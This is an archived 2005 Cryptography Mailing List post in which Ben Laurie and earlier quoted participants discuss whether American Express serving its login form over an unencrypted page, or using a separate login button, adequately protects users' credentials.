AmEx unprotected login site

Ben Laurie ben at algroup.co.uk
Thu Jun 9 08:40:08 EDT 2005


Perry E. Metzger wrote:
> "Steven M. Bellovin" <smb at cs.columbia.edu> writes:
> 
>>>They're still doing the wrong thing. Unless the page was transmitted
>>>to you securely, you have no way to trust that your username and
>>>password are going to them and not to someone who cleverly sent you an
>>>altered version of the page.
>>
>>They're doing the wrong thing, and probably feel they have no choice.  
>>Setting up an SSL session is expensive; most people who go to their 
>>home page do not log in, and hence do not (to Amex) require 
>>cryptographic protection.
> 
> 
> That's why Citibank and most well run bank sites have you click on a
> button on the front page to go to the login screen. There are ways to
> handle this correctly.

Why is this better? The button you click can just as easily take you to 
a site other than the one intended.

-- 
 >>>ApacheCon Europe<<<                   http://www.apachecon.com/

http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to majordomo at metzdowd.com



More information about the cryptography mailing list